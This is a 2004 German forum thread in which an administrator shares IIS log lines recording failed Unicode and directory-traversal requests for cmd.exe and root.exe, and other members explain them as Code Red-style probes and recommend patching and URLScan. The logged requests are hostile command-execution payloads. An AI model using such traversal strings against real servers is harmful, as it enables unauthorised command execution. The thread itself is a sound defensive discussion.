Crockett 10 Posted July 26, 2004 Report Posted July 26, 2004 Hallo ! Hiermal ein Auszug aus dem Log von meiner IIS. ------ 2004-07-26 07:08:11 192.168.0.5 GET /scripts/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /MSADC/root.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /c/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:11 192.168.0.5 GET /d/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:12 192.168.0.5 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:14 192.168.0.5 GET /scripts/..../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 2004-07-26 07:08:15 192.168.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 80 - 82.83.140.218 - 404 0 64 ---------- Am Ende steht immer der Code 404, heißt das das diese Versuche gescheitert sind oder sollte ich mir sorgen machen ? Gruß Christian
din 10 Posted July 26, 2004 Report Posted July 26, 2004 jepp das ist ein Attack versuch, da versucht jemand sogenannte Unicodes erfolgreich zu testen ums so einen zugriff auf das system zu erhalten. Könnte ein überbleibsel des Code Reds sein der simmer noch irgendwo im Netz umher irrt. Also einfach Windows aktuell halten dann sollte dies keine Bedrohung mehr darstellen. MFG dIN
Crockett 10 Posted July 27, 2004 Author Report Posted July 27, 2004 @din Danke für die Antwort... Sind die Versuche denn fehlgeschlagen weil hinten der Code 404 im Log steht ? Kann man evtl so etwas lokal testen ob der Server auf sowas reagiert ? Gruß Christian
Lian 2,797 Posted July 27, 2004 Report Posted July 27, 2004 Jep, beim Ergebnis 404 (File not Found) sind die Attacken erfolglos. Trotzdem mal über das IIS Lockdown Tool nachdenken - URLscan ist Dein Freund: http://www.microsoft.com/technet/security/tools/locktool.mspx
Crockett 10 Posted July 28, 2004 Author Report Posted July 28, 2004 @Lian Danke für den Link.. Hatte darüber mal was gelesen und auch schon mal runtergeladen. Ließ sich bei mir aber nicht installieren. Setze einen SBS 2003 ein wo der IIS 6.0 drauf läuft. Kann es sein das das Tool nur für die älteren Versionen vom Windows Servern und IIS ist ? Gruß Christian
Lian 2,797 Posted July 28, 2004 Report Posted July 28, 2004 Richtig, bei 2003 ist das Lockdown Tool schon eingebaut.
Crockett 10 Posted July 29, 2004 Author Report Posted July 29, 2004 @Lian Habe beim 2003 Server nichts gefunden ? Kann man das konfigurieren oder ist das einfach Build In ? Gruß Christian
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now